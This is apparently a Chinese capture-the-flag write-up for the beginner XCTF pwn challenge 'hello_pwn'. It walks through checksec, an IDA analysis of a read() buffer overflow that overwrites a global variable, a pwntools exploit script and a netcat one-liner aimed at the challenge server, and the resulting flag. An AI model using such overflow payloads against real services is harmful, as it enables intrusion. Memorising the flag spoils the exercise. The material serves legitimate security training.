- 攻防世界pwn hello_pwn
- 1.checksec走一下
- 2.先跑一下看看
- 4.exp如下
- 5.运行结果如下
- 6.可以不用python
- 总结
1.checksec走一下
可以看到只有 Partial RELRO
没有开启栈保护,是属于简单的栈溢出pwn题
2.先跑一下看看
## 3.拉进IDA看一下
sub_400686函数中调用系统函数直接获取flag
因此如果让60106c == 1853186401就可以获取到flag
看到危险函数read可以实现栈溢出,把601068填满后再覆盖60106c即可
偏移地址是4
然后打入p64(1853186401)
4.exp如下
##coding=utf8 from pwn import * ## 构造与程序交互的对象 sh = remote('111.200.241.244', 52706) ## 构造payload payload = b'x' * 4 payload = payload + p64(1853186401) print(p64(1853186401)) ## 向程序发送字符串 sh.recvuntil("lets get helloworld for bofn") sh.sendline(payload) ## 将代码交互转换为手工交互 sh.interactive()
5.运行结果如下
成功获取到flag
cyberpeace{5e30657f17da9ee9ce8066fbfca87bed}
6.可以不用python
直接nc服务器然后发送垃圾数据+p64(1853186401)即可
nc 111.200.241.244 52706 xxxxaaun
4个‘x’(垃圾数据)+aaun
总结这是一道简单的pwn入门题,运用了简单的栈溢出
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)